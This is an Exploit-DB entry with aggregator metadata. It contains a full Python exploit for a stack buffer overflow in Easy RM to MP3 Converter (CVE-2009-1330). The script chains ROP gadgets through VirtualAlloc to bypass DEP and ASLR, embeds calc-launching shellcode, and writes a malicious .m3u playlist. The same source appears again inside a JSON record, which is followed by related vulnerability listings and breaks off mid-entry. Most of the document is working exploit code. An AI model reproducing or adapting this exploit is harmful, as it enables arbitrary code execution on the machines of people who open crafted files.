ID EDB-ID:39933
Type exploitdb
Reporter Fitzl Csaba
Modified 2016-06-13T00:00:00
Description
Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass. CVE-2009-1330. Local exploit for windows platform
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
# added missing parts, and some optimisation by Csaba Fitzl
rop_gadgets = [
#mov 1000 to EDX - Csaba
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10025a1c, # XOR EDX,EDX # RETN
0x1002bc3d, # MOV EAX,411 # RETN
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc24, # ADD EAX,80 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc41, # ADD EAX,40 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
# AT this point EAX = 0x1000
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
0x41414141, # Filler (compensate)
0x10026d56, # POP EAX # RETN [MSRMfilter03.dll]
0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll]
0x1001b058, # & push esp # ret [MSRMfilter03.dll]
0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll]
0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx)
0x1001d2ac, # ADD EAX,4 # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10029f74, # POP ECX # RETN [MSRMfilter03.dll]
0xffffffff, #
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll]
0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll]
0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll]
0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
buffersize = 26090
junk = "A" * buffersize
eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} : # ADD ESP,8 # RETN
rop = create_rop_chain()
calc = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
shell = "\x90"*0x10 + calc
exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))
filename = "list.m3u"
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()
{"bulletinFamily": "exploit", "id": "EDB-ID:39933", "cvelist": ["CVE-2009-1330"], "modified": "2016-06-13T00:00:00", "lastseen": "2016-06-13T16:57:18", "edition": 1, "sourceData": "# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass\r\n# Date: 2016-06-12\r\n# Exploit Author: Csaba Fitzl\r\n# Vendor Homepage: N/A\r\n# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe\r\n# Version: 2.7.3.700\r\n# Tested on: Windows 7 x64\r\n# CVE : CVE-2009-1330\r\n\r\nimport struct\r\n\r\ndef create_rop_chain():\r\n\r\n\t# rop chain generated with mona.py - www.corelan.be\r\n\t# added missing parts, and some optimisation by Csaba Fitzl\r\n\trop_gadgets = [\r\n\r\n\t #mov 1000 to EDX - Csaba\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x10025a1c, # XOR EDX,EDX # RETN \r\n\t 0x1002bc3d, # MOV EAX,411 # RETN\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc24, # ADD EAX,80 # POP EBP # RETN\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1002dc41, # ADD EAX,40 # POP EBP # RETN\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x10023327, # INC EAX # RETN\r\n\t 0x10023327, # INC EAX # RETN\r\n\t 0x10023327, # INC EAX # RETN\r\n\t # AT this point EAX = 0x1000\r\n\t 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI\r\n\t 0x41414141, # Filler (compensate)\r\n\t \r\n\t\r\n\t 0x10026d56, # POP EAX # RETN [MSRMfilter03.dll] \r\n\t 0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]\r\n\t 0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]\r\n\t \r\n\t 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll] \r\n\t 0x1001b058, # & push esp # ret [MSRMfilter03.dll]\r\n\t 0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll] \r\n\t 0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx)\r\n\t 0x1001d2ac, # ADD EAX,4 # RETN\r\n\t 0x10023327, # INC EAX # RETN\r\n\t 0x10023327, # INC EAX # RETN\r\n\t 0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] \r\n\t 0x41414141, # Filler (compensate)\r\n\t 0x41414141, # Filler (compensate)\r\n\r\n\t 0x10029f74, # POP ECX # RETN [MSRMfilter03.dll] \r\n\t 0xffffffff, # \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] \r\n\t 0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll] \r\n\t 0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll]\r\n\t 0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll] \r\n\t 0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP\r\n\t 0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL \r\n\r\n\t]\r\n\treturn ''.join(struct.pack('<I', _) for _ in rop_gadgets)\r\n\r\nbuffersize = 26090\r\n\r\njunk = \"A\" * buffersize\r\n\r\neip = '\\x85\\x22\\x01\\x10' # {pivot 8 / 0x08} : # ADD ESP,8 # RETN\r\n\r\nrop = create_rop_chain()\r\n\r\ncalc = (\r\n\"\\x31\\xD2\\x52\\x68\\x63\\x61\\x6C\\x63\\x89\\xE6\\x52\\x56\\x64\"\r\n\"\\x8B\\x72\\x30\\x8B\\x76\\x0C\\x8B\\x76\\x0C\\xAD\\x8B\\x30\\x8B\"\r\n\"\\x7E\\x18\\x8B\\x5F\\x3C\\x8B\\x5C\\x1F\\x78\\x8B\\x74\\x1F\\x20\"\r\n\"\\x01\\xFE\\x8B\\x4C\\x1F\\x24\\x01\\xF9\\x42\\xAD\\x81\\x3C\\x07\"\r\n\"\\x57\\x69\\x6E\\x45\\x75\\xF5\\x0F\\xB7\\x54\\x51\\xFE\\x8B\\x74\"\r\n\"\\x1F\\x1C\\x01\\xFE\\x03\\x3C\\x96\\xFF\\xD7\")\r\n \r\n\r\nshell = \"\\x90\"*0x10 + calc\r\n\r\nexploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))\r\n\r\nfilename = \"list.m3u\"\r\ntextfile = open(filename , 'w')\r\ntextfile.write(exploit)\r\ntextfile.close()", "published": "2016-06-13T00:00:00", "href": "https://www.exploit-db.com/exploits/39933/", "osvdbidlist": [], "reporter": "Fitzl Csaba", "hash": "0a954293c47a4a5a50c1c2c96189a5459e001e045f43328f90b1db76b357af4d", "title": "Easy RM to MP3 Converter 2.7.3.700 - .m3u Exploit with Universal DEP+ASLR Bypass", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass. CVE-2009-1330. Local exploit for windows platform", "references": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/39933/", "viewCount": 1, "enchantments": {"vulnersScore": 5.0}}
{"result": {"cve": [{"id": "CVE-2009-1330", "type": "cve", "title": "CVE-2009-1330", "description": "Stack-based buffer overflow in Easy RM to MP3 Converter allows remote attackers to execute arbitrary code via a long filename in a playlist (.pls) file.", "published": "2009-04-17T10:08:52", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1330", "cvelist": ["CVE-2009-1330"], "lastseen": "2017-09-29T14:26:35"}], "zdt": [{"id": "1337DAY-ID-25598", "type": "zdt", "title": "Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)", "description": "Exploit for windows platform in category local exploits", "published": "2016-06-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://0day.today/exploit/description/25598", "cvelist": ["CVE-2009-1330"], "lastseen": "2018-01-10T03:22:59"}], "openvas": [{"id": "OPENVAS:900633", "type": "openvas", "title": "Easy RM to MP3 Converter Buffer Overflow Vulnerability", "description": "This host is installed with Easy RM to MP3 Converter and is\nprone to Buffer Overflow Vulnerability.", "published": "2009-04-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=900633", "cvelist": ["CVE-2009-1330"], "lastseen": "2017-07-02T21:14:00"}, {"id": "OPENVAS:1361412562310900633", "type": "openvas", "title": "Easy RM to MP3 Converter Buffer Overflow Vulnerability", "description": "This host is installed with Easy RM to MP3 Converter and is\nprone to Buffer Overflow Vulnerability.", "published": "2009-04-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900633", "cvelist": ["CVE-2009-1330"], "lastseen": "2018-04-06T11:38:35"}], "exploitdb": [{"id": "EDB-ID:10602", "type": "exploitdb", "title": "Easy RM to MP3 27.3.700 - WinXP SP3", "description": "Easy RM to MP3 27.3.700 WinXP SP3. CVE-2009-1330. Local exploit for windows platform", "published": "2009-12-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/10602/", "cvelist": ["CVE-2009-1330"], "lastseen": "2016-02-01T12:49:50"}, {"id": "EDB-ID:10619", "type": "exploitdb", "title": "Easy RM to MP3 27.3.700 - Local BoF xp sp2", "description": "Easy RM to MP3 27.3.700 local BOF xp sp2. CVE-2009-1330. Local exploit for windows platform", "published": "2009-12-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/10619/", "cvelist": ["CVE-2009-1330"], "lastseen": "2016-02-01T12:51:22"}, {"id": "EDB-ID:14550", "type": "exploitdb", "title": "Exploit Easy RM to MP3 2.7.3.700 - .m3u & .pls & .smi & .wpl & .wax & .wvx & .ram", "description": "Exploit Easy RM to MP3 2.7.3.700 ( .m3u , .pls , .smi , .wpl , .wax , .wvx , .ram). CVE-2009-1330. Local exploit for windows platform", "published": "2010-08-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/14550/", "cvelist": ["CVE-2009-1330"], "lastseen": "2016-02-01T20:04:51"}, {"id": "EDB-ID:8427", "type": "exploitdb", "title": "Easy RM to MP3 Converter Universal Stack Overflow Exploit", "description": "Easy RM to MP3 Converter Universal Stack Overflow Exploit. CVE-2009-1329,CVE-2009-1330. Local exploit for windows platform", "published": "2009-04-14T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8427/", "cvelist": ["CVE-2009-1329", "CVE-2009-1330"], "lastseen": "2016-02-01T05:30:11"}, {"id": "EDB-ID:8402", "type": "exploitdb", "title": "Mini-stream Ripper - .M3U Local Stack Overflow PoC", "description": "Mini-stream Ripper (.M3U File) Local Stack Overflow PoC. 